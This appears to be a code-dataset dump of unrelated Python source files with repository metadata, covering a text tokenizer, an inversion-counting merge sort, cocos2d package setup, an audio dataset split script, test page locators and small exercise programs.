predictedLabels = []
for index in range(len(testData)):
result = self.predict(model, testData[index])
predictedLabels.append(result)
return predictedLabels
def getAccuracy(self, testData, predictions):
correctVal = 0
for index in range(len(testData)):
if testData[index][-1] == predictions[index]:
correctVal += 1
return (correctVal / float(len(testData))) * 100
|
[
"rishabh.zn200@gmail.com"
] |
rishabh.zn200@gmail.com
|
12b858ee18a0ba1b6ccd398cd6dac9011d70ce92
|
ff7dcf446ad392a884ee87759a6753403962eaf2
|
/tools/itools.py
|
8e807af7a65dbed4e24d732315e884b3cd117357
|
[] |
no_license
|
alexzt0131/xiaoan
|
9505b141ebbcade40b447fb1cb2d769147aa816e
|
380b74abcb68dc1d1070cc36792557fb93df34ad
|
refs/heads/master
| 2020-04-01T15:04:30.644948
| 2018-10-20T12:49:29
| 2018-10-20T12:49:29
| 153,319,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,173
|
py
|
import datetime
import os
from django.shortcuts import render
class itools():
def retrive(rootdir=''):
'''
#遍历特定文件夹内文件名
'''
ret = {
'files': None
}
# rootdir = 'static/images' # 指明被遍历的文件夹
for parent, dirnames, file_names in os.walk(rootdir):
ret['files'] = file_names
# for parent, dirnames, filenames in os.walk(rootdir): # 三个参数:分别返回1.父目录 2.所有文件夹名字(不含路径) 3.所有文件名字
# # for dirname in dirnames: # 输出文件夹信息
# # print("parent is:" + parent)
# # print("dirname is" + dirname)
# print(filenames)
# for filename in filenames: # 输出文件信息
#
# # print("parent is:" + parent)
# print("in retrive_filename is:" + filename)
#
# # full_path = os.path.join(parent, filename)# 输出文件路径信息
return ret
def getCurrentDateTime(self=None):
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
|
[
"110021341@qq.com"
] |
110021341@qq.com
|
e844e04c3112f7239f8d53d89308b0d3ad515141
|
5efcbdd65e3e86251dd70dafb69720d623fa0f52
|
/dialogue/tokenizer.py
|
adb693c0ae08a5f9bd25c3de25f2ef916ffc273e
|
[
"Apache-2.0"
] |
permissive
|
xiejinwen113/nlp-dialogue
|
d39ffa0ccf331746f07d05f0904a2907f25c1336
|
51558c32c52f244bb2dd5a52b7dbeb482cf813e6
|
refs/heads/main
| 2023-08-01T11:46:48.825654
| 2021-09-08T16:10:35
| 2021-09-08T16:10:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,510
|
py
|
#! -*- coding: utf-8 -*-
""" 文本分词工具及Tokenizer
"""
# Author: DengBoCong <bocongdeng@gmail.com>
#
# License: Apache-2.0 License
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import numpy as np
import os
from collections import defaultdict
from collections import OrderedDict
class Tokenizer(object):
""" 文本分词工具及Tokenizer
"""
def __init__(self, num_words=None, filters='!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n', lower=True,
split=' ', char_level=False, oov_token=None, document_count=0) -> None:
"""
:param num_words: 保存的最大token数,基于出现频率
:param filters: 过滤规则, 默认过滤所有标点符号、制表符、换行符等
:param lower: 是否将文本转换为小写
:param split: 分隔符
:param char_level: 是否以字符级作为token
:param oov_token: 未登录词
:param document_count: 文本总数
"""
self.word_counts = OrderedDict()
self.word_docs = defaultdict(int)
self.filters = filters
self.split = split
self.lower = lower
self.num_words = num_words
self.document_count = document_count
self.char_level = char_level
self.oov_token = oov_token
self.index_docs = defaultdict(int)
self.word_index = {}
self.index_word = {}
def fit_on_texts(self, texts: list) -> None:
""" 更新内部词汇表
:param texts: 文本列表
:return: 转换后的seq
"""
for text in texts:
self.document_count += 1
if self.char_level or isinstance(text, list):
if self.lower:
if isinstance(text, list):
text = [text_elem.lower() for text_elem in text]
else:
text = text.lower()
seq = text
else:
seq = text_to_word_sequence(text, filters=self.filters, lower=self.lower, split=self.split)
for w in seq:
if w in self.word_counts:
self.word_counts[w] += 1
else:
self.word_counts[w] = 1
for w in set(seq):
# 计算token出现在多少个文本中
self.word_docs[w] += 1
wcounts = list(self.word_counts.items())
wcounts.sort(key=lambda x: x[1], reverse=True)
# 将未登录词放在词汇表开头
if self.oov_token is None:
sorted_voc = []
else:
sorted_voc = [self.oov_token]
sorted_voc.extend(wc[0] for wc in wcounts)
# 索引0作为保留索引
self.word_index = dict(zip(sorted_voc, list(range(1, len(sorted_voc) + 1))))
self.index_word = {c: w for w, c in self.word_index.items()}
for w, c in list(self.word_docs.items()):
self.index_docs[self.word_index[w]] = c
def texts_to_sequences(self, texts) -> list:
""" 将文本序列转化为token序列,注意了,只有前
num_words个token才会被转换,其余转换为oov_token词
:param texts: 文本列表
:return: 转换后的seq
"""
return list(self.texts_to_sequences_generator(texts))
def texts_to_sequences_generator(self, texts):
""" 将文本序列转化为token序列的生成器
"""
num_words = self.num_words
oov_token_index = self.word_index.get(self.oov_token)
for text in texts:
if self.char_level or isinstance(text, list):
if self.lower:
if isinstance(text, list):
text = [text_elem.lower() for text_elem in text]
else:
text = text.lower()
seq = text
else:
seq = text_to_word_sequence(text, filters=self.filters, lower=self.lower, split=self.split)
vect = []
for w in seq:
i = self.word_index.get(w)
if i is not None:
if num_words and i >= num_words:
if oov_token_index is not None:
vect.append(oov_token_index)
else:
vect.append(i)
elif self.oov_token is not None:
vect.append(oov_token_index)
yield vect
def sequences_to_texts(self, sequences) -> list:
""" 将token序列转化为文本序列的生成器
:param sequences: token序列
:return: 转换后的文本序列
"""
return list(self.sequences_to_texts_generator(sequences))
def sequences_to_texts_generator(self, sequences):
""" 将token序列转化为文本序列,注意了,只有前
num_words个token才会被转换,其余转换为token词
:param sequences: token序列
:return: 转换后的文本序列
"""
num_words = self.num_words
oov_token_index = self.word_index.get(self.oov_token)
for seq in sequences:
vect = []
for num in seq:
word = self.index_word.get(num)
if word is not None:
if num_words and num >= num_words:
if oov_token_index is not None:
vect.append(self.index_word[oov_token_index])
else:
vect.append(word)
elif self.oov_token is not None:
vect.append(self.index_word[oov_token_index])
vect = ' '.join(vect)
yield vect
def get_config(self) -> dict:
""" 获取分词器的配置字典 """
json_word_counts = json.dumps(self.word_counts)
json_word_docs = json.dumps(self.word_docs)
json_index_docs = json.dumps(self.index_docs)
json_word_index = json.dumps(self.word_index)
json_index_word = json.dumps(self.index_word)
return {
'num_words': self.num_words,
'filters': self.filters,
'lower': self.lower,
'split': self.split,
'char_level': self.char_level,
'oov_token': self.oov_token,
'document_count': self.document_count,
'word_counts': json_word_counts,
'word_docs': json_word_docs,
'index_docs': json_index_docs,
'index_word': json_index_word,
'word_index': json_word_index
}
def to_json(self, **kwargs) -> str:
""" 将分词器相关数据转化为json格式返回
"""
config = self.get_config()
tokenizer_config = {
'class_name': self.__class__.__name__,
'configs': config
}
return json.dumps(tokenizer_config, **kwargs)
def text_to_word_sequence(text, filters='!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n', lower=True, split=" ") -> list:
""" 讲文本转换成token序列
:param text: 文本列表
:param filters: 过滤规则, 默认过滤所有标点符号、制表符、换行符等
:param lower: 是否将文本转换为小写
:param split: 分隔符
"""
if lower:
text = text.lower()
translate_dict = {c: split for c in filters}
translate_map = str.maketrans(translate_dict)
text = text.translate(translate_map)
seq = text.split(split)
return [i for i in seq if i]
def pad_sequences(sequences, max_len=None, dtype='int32',
padding='pre', truncating='pre', value=0.) -> np.ndarray:
""" 填充序列,如果未指定最大长度,则默认使用序列中最长长度
:param sequences: 需要填充的序列
:param max_len: 最大长度
:param dtype: 输出类型
:param padding: 填充类型,pre在前,post在后
:param truncating: 截断类型,pre在前,post在后
:param value: 填充值类型,float或者是string
:return: 形状为(len(sequences), max_len)的numpy数组
"""
if not hasattr(sequences, '__len__'):
raise ValueError('`sequences` must be iterable.')
num_samples = len(sequences)
lengths = []
sample_shape = ()
flag = True
for x in sequences:
try:
lengths.append(len(x))
if flag and len(x):
sample_shape = np.asarray(x).shape[1:]
flag = False
except TypeError:
raise ValueError('`sequences` must be a list of iterables. '
'Found non-iterable: ' + str(x))
if max_len is None:
max_len = np.max(lengths)
is_dtype_str = np.issubdtype(dtype, np.str_) or np.issubdtype(dtype, np.unicode_)
if isinstance(value, str) and dtype != object and not is_dtype_str:
raise ValueError("`dtype` {} is not compatible with `value`'s type: {}\n"
"You should set `dtype=object` for variable length strings."
.format(dtype, type(value)))
x = np.full((num_samples, max_len) + sample_shape, value, dtype=dtype)
for idx, s in enumerate(sequences):
if not len(s):
continue
if truncating == 'pre':
trunc = s[-max_len:]
elif truncating == 'post':
trunc = s[:max_len]
else:
raise ValueError('Truncating type "%s" '
'not understood' % truncating)
trunc = np.asarray(trunc, dtype=dtype)
if trunc.shape[1:] != sample_shape:
raise ValueError('Shape of sample %s of sequence at position %s '
'is different from expected shape %s' %
(trunc.shape[1:], idx, sample_shape))
if padding == 'post':
x[idx, :len(trunc)] = trunc
elif padding == 'pre':
x[idx, -len(trunc):] = trunc
else:
raise ValueError('Padding type "%s" not understood' % padding)
return x
def tokenizer_from_json(json_string) -> Tokenizer:
""" 将Tokenizer序列化的json转化为Tokenizer实例
:param json_string: json字符串
:return: 分词器
"""
tokenizer_config = json.loads(json_string)
config = tokenizer_config.get('configs')
word_counts = json.loads(config.pop('word_counts'))
word_docs = json.loads(config.pop('word_docs'))
index_docs = json.loads(config.pop('index_docs'))
index_docs = {int(k): v for k, v in index_docs.items()}
index_word = json.loads(config.pop('index_word'))
index_word = {int(k): v for k, v in index_word.items()}
word_index = json.loads(config.pop('word_index'))
tokenizer = Tokenizer(**config)
tokenizer.word_counts = word_counts
tokenizer.word_docs = word_docs
tokenizer.index_docs = index_docs
tokenizer.word_index = word_index
tokenizer.index_word = index_word
return tokenizer
def load_tokenizer(dict_path: str) -> Tokenizer:
""" 通过字典加载tokenizer
:param dict_path: 字典路径
:return tokenizer: 分词器
"""
if not os.path.exists(dict_path):
print("字典不存在,请检查之后重试")
exit(0)
with open(dict_path, "r", encoding="utf-8") as dict_file:
json_string = dict_file.read().strip().strip("\n")
tokenizer = tokenizer_from_json(json_string)
return tokenizer
|
[
"1210212670@qq.com"
] |
1210212670@qq.com
|
7e7ac221c2fb863293cae9ff284aabecf06ef066
|
5fa6053e57e4ce18f8669ac5fc88adf981b9d440
|
/zad13.py
|
c42ff0ae799a38493b41a04e3c4317d05778c9b9
|
[] |
no_license
|
olkiszova/python_kurs_16.03.19
|
0a6994cd32bf2b696a6666d4bb76bf8d4770a8a0
|
23be0391f8ab3b825c0d20a4cdb7040352a6d4a9
|
refs/heads/master
| 2020-05-03T09:36:58.760353
| 2019-06-08T21:47:15
| 2019-06-08T21:47:15
| 178,558,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 509
|
py
|
#i=0
#suma_temperatur = 0
#while i !=7:
# suma_temperatur += float (input("Podaj temperaturę: "))
# i = i + 1 # i=+1
# print(i, suma_temperatur)
#print ("Srednia: ", suma_temperatur, i, suma_temperatur/i)
i = 0
suma_temperatur = 0
while True:
komenda = input ("Podaj temperturę lub wpisz [k] by zakończyć: ")
if komenda == 'k':
break
suma_temperatur += float (komenda)
i = i+1
print (i, suma_temperatur)
print ("Średnia", suma_temperatur, i, suma_temperatur/1)
|
[
"tomczyk.aleksandra12@gmail.com"
] |
tomczyk.aleksandra12@gmail.com
|
28be6b06513d0f7b37d4bd20256ca3e424177d80
|
0466559817d3a1be9409da2c83db99c4db3bacfe
|
/hubcheck/pageobjects/widgets/ticket_content.py
|
7cb8b32251cdd0a4d4a1efb280dfcbd8869a58c3
|
[
"MIT"
] |
permissive
|
ken2190/hubcheck
|
955cf9b75a1ee77e28256dfd3a780cfbc17de961
|
2ff506eb56ba00f035300862f8848e4168452a17
|
refs/heads/master
| 2023-03-20T15:17:12.949715
| 2015-09-29T16:11:18
| 2015-09-29T16:11:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,146
|
py
|
from hubcheck.pageobjects.widgets.ticket_comment_base import TicketCommentBase
class TicketContent(TicketCommentBase):
def __init__(self, owner, locatordict={}):
super(TicketContent,self).__init__(owner,locatordict)
# load hub's classes
TicketContent_Locators = self.load_class('TicketContent_Locators')
# update this object's locator
self.locators.update(TicketContent_Locators.locators)
# update the locators with those from the owner
self.update_locators_from_owner()
# update the component's locators with this objects overrides
self._updateLocators()
class TicketContent_Locators_Base_1(object):
"""locators for TicketContent object"""
locators = {
'base' : "css=.ticket",
'commenter' : "css=.ticket-title strong a",
'body' : "css=.ticket-content p:nth-of-type(2)",
}
class TicketContent_Locators_Base_2(object):
"""locators for TicketContent object"""
locators = {
'base' : "css=.ticket",
'commenter' : "css=.entry-title strong a",
'body' : "css=.entry-body",
}
|
[
"telldsk@gmail.com"
] |
telldsk@gmail.com
|
d0a7df11a0005fcb97be5760df887d2e47efea9e
|
937010ba3936b389eb128b05849afe8a8a76a9ff
|
/week2/sort_and_coint.py
|
c9818017268c168058446e34535bc11a1d0e7067
|
[] |
no_license
|
maglili/coursera_algo_c1
|
6ae50bcb09cf9385ced42dd6052ab121a3de16c6
|
3fb2af1d3d1352daf0a1c567c368887331cb3e36
|
refs/heads/main
| 2023-08-22T02:56:50.389126
| 2021-10-20T04:03:20
| 2021-10-20T04:03:20
| 391,672,270
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
def sort_and_count(array, length):
"""
Given a list, find its inversion.
"""
# base case
if length == 1:
return array, 0
# recursive
else:
# sort
n = round(length / 2)
B, X = sort_and_count(array[:n], n)
C, Y = sort_and_count(array[n:], length - n)
# merge
i = j = 0
count = 0
sorted_list = []
for _ in range(length):
# avoid out of index
if i == len(B):
sorted_list += C[j:]
break
elif j == len(C):
sorted_list += B[i:]
break
if B[i] < C[j]:
sorted_list.append(B[i])
i += 1
else:
sorted_list.append(C[j])
j += 1
count += len(B[i:])
return sorted_list, count + X + Y
if __name__ == "__main__":
import time
with open("IntegerArray.txt", encoding="utf-8") as fh:
input_array = []
for row in fh:
input_array.append(int(row))
# input_array = [8,7,6,5,4,3,2,1]
start = time.time()
_, ans = sort_and_count(input_array, len(input_array))
print("ans:", ans)
print("time:", time.time() - start)
|
[
"gibson870811@gmail.com"
] |
gibson870811@gmail.com
|
a2d5d4b1433196b40ed1c08abd1bf53971bcc7db
|
6b85714401cfe9634da8cbd84bfc2c54b45a85a1
|
/chivySources/cocos/__init__.py
|
2c7864e8c5203d98d429fe60e85fe736165b8855
|
[] |
no_license
|
sapal/chivy
|
4c4f2a80968a663b6f048631a30a3cf2369a4aff
|
e75bfae289bc0c367764be84abc9978528840f75
|
refs/heads/master
| 2021-01-21T16:11:01.900261
| 2017-05-20T09:52:10
| 2017-05-20T09:52:10
| 91,880,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,805
|
py
|
# ----------------------------------------------------------------------------
# cocos2d
# Copyright (c) 2008-2010 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''cocos2d
cocos2d is a framework for building 2D games, demos, and other graphical/interactive applications.
Main Features:
--------------
* Flow control: Manage the flow control between different scenes in an easy way
* Sprites: Fast and easy sprites
* Actions: Just tell sprites what you want them to do. Composable actions like move, rotate, scale and much more
* Effects: Effects like waves, twirl, lens and much more
* Tiled Maps: Support for rectangular and hexagonal tiled maps
* Transitions: Move from scene to scene with style
* Menus: Built in classes to create menus
* Text Rendering: Label and HTMLLabel with action support
* Documentation: Programming Guide + API Reference + Video Tutorials + Lots of simple tests showing how to use it
* Built-in Python Interpreter: For debugging purposes
* BSD License: Just use it
* Pyglet Based: No external dependencies
* OpenGL Based: Hardware Acceleration
http://cocos2d.org
'''
__docformat__ = 'restructuredtext'
__version__ = "0.4rc0"
__author__ = "cocos2d team"
version = __version__
import sys
# add the cocos resources path
import os, pyglet
#pyglet.resource.path.append(
# os.path.join(os.path.dirname(os.path.realpath(__file__)), "resources")
# )
#pyglet.resource.reindex()
try:
unittesting = os.environ['cocos_utest']
except KeyError:
unittesting = False
del os, pyglet
# in windows we use the pygame package to get the SDL dlls
# we must get the path here because the inner pygame module will hide the real
if sys.platform == 'win32':
import imp
try:
dummy, sdl_lib_path, dummy = imp.find_module('pygame')
del dummy
except ImportError:
sdl_lib_path = None
def import_all():
import actions
import director
import layer
import menu
import sprite
import path
import scene
import grid
import text
import camera
import draw
import skeleton
import rect
import tiles
if not unittesting:
import_all()
|
[
"sapalskimichal@gmail.com"
] |
sapalskimichal@gmail.com
|
a0fb4934cdfbb3fc71d1a7e31b7ec24409a53dbf
|
1eeb22ad92df76688a8a33d8f132eaef183b49ca
|
/analysis/split_train_dev_test_set.py
|
851c695559ceb775863fea09ec1aa1b1182e4ab7
|
[
"MIT"
] |
permissive
|
viig99/mixmatch-freesound
|
6154a739cd6684ea983a600b6e74929712075c72
|
2abe33c1c08206b0bbbc2e324a529c6a5cca140b
|
refs/heads/master
| 2020-05-30T11:00:53.789434
| 2019-06-20T10:35:08
| 2019-06-20T10:35:08
| 189,687,292
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,391
|
py
|
import random
from random import sample
from shutil import copyfile
random.seed(9)
base_dir = '/home/gpu_user/newdisk2/hari/data/freesound/'
train_set = 'train_curated'
train_dir = base_dir + train_set + '/'
train_csv = base_dir + train_set + '.csv'
output_csv_train = train_csv + '_train'
output_csv_dev = train_csv + '_dev'
output_csv_test = train_csv + '_test'
output_base_dir = base_dir + 'split_train_curated/'
audio_train = output_base_dir + 'train/'
audio_dev = output_base_dir + 'dev/'
audio_test = output_base_dir + 'test/'
lines = open(train_csv).readlines()
lines = [line.strip() for line in lines]
header = lines[0]
lines = lines[1:]
bad_audio_files = ['f76181c4.wav', '77b925c2.wav', '6a1f682a.wav', 'c7db12aa.wav', '7752cc8a.wav', '1d44b0bd.wav']
assert lines[0].split(',')[0].endswith('.wav')
print(lines[0].split(',')[0].strip())
line_cnt_before_filter = len(lines)
lines = [line for line in lines if line.split(',')[0].strip() not in bad_audio_files]
line_cnt_after_filter = len(lines)
print(line_cnt_before_filter, len(bad_audio_files), line_cnt_after_filter)
assert line_cnt_before_filter - len(bad_audio_files) == line_cnt_after_filter
random.shuffle(lines)
train_prop, dev_prop, test_prop = 0.9, 0.05, 0.05
train_set_size = int(len(lines)*train_prop)
dev_set_size = int(len(lines)*dev_prop)
train_lines = lines[:train_set_size]
dev_lines = lines[train_set_size:(train_set_size + dev_set_size)]
test_lines = lines[(train_set_size + dev_set_size):]
def create_set(output_csv, lines_sample, output_audio_dir):
audio_set = set()
with open(output_csv, 'w') as ofp:
ofp.write(header + '\n')
for line in lines_sample:
ofp.write(line + '\n')
audio_file = line.split(',')[0]
audio_set.add(audio_file)
output_audio_path = output_audio_dir + audio_file
src_audio_path = train_dir + audio_file
copyfile(src_audio_path, output_audio_path)
return audio_set
train_audio_set = create_set(output_csv_train, train_lines, audio_train)
dev_audio_set = create_set(output_csv_dev, dev_lines, audio_dev)
test_audio_set = create_set(output_csv_test, test_lines, audio_test)
assert len(train_audio_set.intersection(dev_audio_set)) == 0
assert len(train_audio_set.intersection(test_audio_set)) == 0
assert len(dev_audio_set.intersection(test_audio_set)) == 0
assert len(train_audio_set) + len(dev_audio_set) + len(test_audio_set) == len(lines)
|
[
"harisankarh@gmail.com"
] |
harisankarh@gmail.com
|
449e1d12345df92a61d5b5437d8838435098877e
|
cacdbf688209cce2f39698758346b99de7d5281d
|
/GPS Text Entry.py
|
86c0928ec058b6d6aed34778751c9d97b246cb63
|
[] |
no_license
|
Federico-PizarroBejarano/Don-Mills-Online-Judge
|
27d168e390cdf7be104117d6a699fd7df4104b63
|
6e77978a19d29ec3095687b71dc8eff3565f6a60
|
refs/heads/master
| 2021-05-11T09:14:24.849165
| 2018-01-19T03:42:06
| 2018-01-19T03:42:06
| 118,072,968
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
def find(x):
for i in range(5):
if x in fir[i]:
return [i, fir[i].index(x)]
fir = [["A", "B", "C", "D", "E", "F"], ["G", "H", "I", "J", "K", "L"],
["M", "N", "O", "P", "Q", "R"], ["S", "T", "U", "V", "W", "X"],
["Y", "Z", " ", "-", ".", "/"]]
word = raw_input() + "/"
total = 0
movesy = [0]
movesx = [0]
for i in word:
desy, desx = find(i)
movesy.append(desy)
movesx.append(desx)
for i in range(len(movesy) - 1):
total += abs(movesy[i] - movesy[i+1])
for i in range(len(movesx) - 1):
total += abs(movesx[i] - movesx[i+1])
print total
|
[
"noreply@github.com"
] |
Federico-PizarroBejarano.noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.